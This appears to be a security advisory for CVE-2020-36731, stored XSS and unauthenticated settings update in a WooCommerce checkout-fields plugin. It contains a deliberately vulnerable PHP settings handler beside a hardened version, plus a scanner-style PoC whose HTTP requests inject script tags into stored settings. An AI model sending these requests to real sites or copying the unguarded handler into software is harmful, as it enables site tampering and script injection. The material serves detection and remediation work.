The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
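The bug class behind this advisory, shown as an added illustration (this is editor-written example code, not the plugin's source and not the vendor's 2.3.2 fix): a settings handler hooked to admin_init with no capability check, no nonce and no sanitization, beside a hardened handler. admin_init fires on every request that loads /wp-admin/, including admin-ajax.php and admin-post.php, which WordPress serves to logged-out visitors as well, so a callback on that hook is reachable without authentication unless it checks for itself. The option name, the settings[order][<field_key>][<attr>] layout and the nonce action name are assumptions modelled on the PoC request on this page; the class names are invented.

```php
<?php
/**
 * Editor-added illustration, not the plugin's code. Option name, settings
 * layout and nonce action are assumptions modelled on the PoC request;
 * class names are invented.
 */

// ---------------------------------------------------------------------------
// Vulnerable pattern. admin_init runs on every /wp-admin/ request, including
// admin-ajax.php and admin-post.php, which are served to logged-out visitors.
// Nothing below checks who is posting or what is being stored.
// ---------------------------------------------------------------------------
class Vulnerable_Checkout_Fields_Settings {
    public function __construct() {
        add_action( 'admin_init', array( $this, 'updateSettingsAction' ) );
    }

    public function updateSettingsAction() {
        if ( isset( $_POST['inspire_checkout_fields']['settings'] ) && 'update' === ( $_POST['action'] ?? '' ) ) {
            // Raw nested array straight into wp_options. A field key such as
            // "order_<script>alert(1)</script>_" is stored verbatim and later
            // echoed unescaped into the settings screen (stored XSS).
            update_option( 'inspire_checkout_fields_settings', $_POST['inspire_checkout_fields']['settings'] );
        }
    }
}

// ---------------------------------------------------------------------------
// Hardened pattern: authorize, verify the nonce, allow-list and sanitize on
// the way in, and still escape on the way out.
// ---------------------------------------------------------------------------
class Hardened_Checkout_Fields_Settings {
    const OPTION = 'inspire_checkout_fields_settings';   // assumed option name
    const NONCE  = 'inspire_checkout_fields_update';     // assumed nonce action

    public function __construct() {
        add_action( 'admin_init', array( $this, 'updateSettingsAction' ) );
    }

    public function updateSettingsAction() {
        if ( ! isset( $_POST['inspire_checkout_fields']['settings'] ) || 'update' !== ( $_POST['action'] ?? '' ) ) {
            return;
        }
        // 1. Authorization: only users who may manage the shop get this far.
        if ( ! current_user_can( 'manage_woocommerce' ) ) {
            wp_die( esc_html__( 'You are not allowed to change these settings.', 'example' ), 403 );
        }
        // 2. CSRF: the request must carry the _wpnonce our own form emitted.
        check_admin_referer( self::NONCE );
        // 3. Sanitize before storage.
        $raw = wp_unslash( $_POST['inspire_checkout_fields']['settings'] );
        update_option( self::OPTION, $this->sanitize_settings( is_array( $raw ) ? $raw : array() ) );
    }

    private function sanitize_settings( array $settings ) {
        $allowed_attrs = array( 'name', 'label', 'placeholder', 'class', 'option', 'type', 'visible', 'required', 'custom_field' );
        $allowed_types = array( 'text', 'textarea', 'select', 'checkbox' );
        $clean = array();
        foreach ( $settings as $section => $fields ) {
            // Reject, rather than silently rename, any key that is not already a
            // plain slug: sanitize_key() keeps only [a-z0-9_-], so a key carrying
            // "<script>" can never pass this comparison.
            if ( ! is_string( $section ) || sanitize_key( $section ) !== $section || ! is_array( $fields ) ) {
                continue;
            }
            foreach ( $fields as $key => $attrs ) {
                if ( ! is_string( $key ) || sanitize_key( $key ) !== $key || ! is_array( $attrs ) ) {
                    continue;
                }
                foreach ( $attrs as $attr => $value ) {
                    if ( ! in_array( $attr, $allowed_attrs, true ) || is_array( $value ) ) {
                        continue;
                    }
                    switch ( $attr ) {
                        case 'visible':
                        case 'required':
                        case 'custom_field':
                            $clean[ $section ][ $key ][ $attr ] = (int) (bool) $value;
                            break;
                        case 'type':
                            $clean[ $section ][ $key ][ $attr ] = in_array( $value, $allowed_types, true ) ? $value : 'text';
                            break;
                        default:
                            $clean[ $section ][ $key ][ $attr ] = sanitize_text_field( $value );
                    }
                }
            }
        }
        return $clean;
    }

    // 4. Output escaping: sanitized data is still escaped where it is rendered.
    public function render_field_row( $key, array $field ) {
        printf(
            '<tr><td>%s</td><td><input type="text" name="%s" value="%s"></td></tr>',
            esc_html( $key ),
            esc_attr( 'inspire_checkout_fields[settings][order][' . $key . '][label]' ),
            esc_attr( $field['label'] ?? '' )
        );
    }

    public function render_form_nonce() {
        wp_nonce_field( self::NONCE ); // emits the _wpnonce field check_admin_referer() expects
    }
}
```

The hardened version drops a field key that is not already a plain slug instead of letting sanitize_key() rewrite it, so order_<script>alert(1)</script>_ is discarded rather than stored under a mangled name; the boolean attributes and the field type are coerced to an allow-list instead of being treated as free text. Render-time escaping stays in place regardless, because a site upgraded to a fixed version still carries whatever was written into the option while it was vulnerable, and the PoC's second request shows exactly the kind of key that would remain there.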
PoC code [public]
id: CVE-2020-36731

info:
  name: Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
  author: popcorn94
  severity: high
  description: |
    The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
  remediation: Fixed in 2.3.2.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36731
    - https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2020-36731
    cwe-id: CWE-79
    epss-score: 0.03849
    epss-percentile: 0.87739
    cpe: cpe:2.3:a:wpdesk:flexible_checkout_fields_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: wpdesk
    product: flexible_checkout_fields_for_woocommerce
    framework: wordpress
    fofa-query: body="/wp-content/plugins/flexible-checkout-fields/"
    publicwww-query: "/wp-content/plugins/flexible-checkout-fields/"
  tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

  - raw:
      - |
        POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Blabel%5D=Order+Notes&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bplaceholder%5D=Notes+about+your+order%2C+e.g.+special+notes+for+delivery.&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bclass%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_<script>alert(document.domain)</script>_%5D%5Bcustom_field%5D=1

    matchers:
      - type: word
        words:
          - "order_<script>alert(document.domain)</script>"
          - "[custom_field]"
          - "inspire_checkout_fields[settings][order]"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Blabel%5D=Order+Notes&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bplaceholder%5D=Notes+about+your+order%2C+e.g.+special+notes+for+delivery.&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bclass%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bcustom_field%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bname%5D=order_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Blabel%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Boption%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Btype%5D=text&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bplaceholder%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bclass%5D=&reset_settings=Reset+Section+Settings

    matchers:
      - type: word
        words:
          - "Settings resetted."
# digest: 4b0a00483046022100f48b2f84dd62a9b3d709612cf3fab81dc0e1dbebae43fc93b6ba886e2dedeaaa022100ec7d62da82e2c217a129136974b94425827f6789439395ede662ae3f56ff9288:922c64590222798bb761d5b6d8e72950